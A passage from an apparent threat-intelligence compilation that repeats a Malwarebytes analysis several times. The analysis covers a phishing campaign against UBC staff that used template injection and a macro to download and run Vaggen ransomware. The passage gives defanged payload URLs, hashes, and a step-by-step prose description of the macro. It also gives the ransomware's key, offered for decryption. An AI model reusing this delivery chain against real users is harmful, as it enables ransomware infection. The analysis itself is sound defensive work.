conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 822 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 823 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 824 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 825 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 826 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 827 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 828 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 829 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 830 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 831 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 832 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 833 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 834 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 835 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 836 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 837 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 838 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 839 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 840 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 841 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 842 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 843 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 844 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 845 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 846 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 847 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 848 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 849 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 850 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 851 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 852 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 853 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 854 of 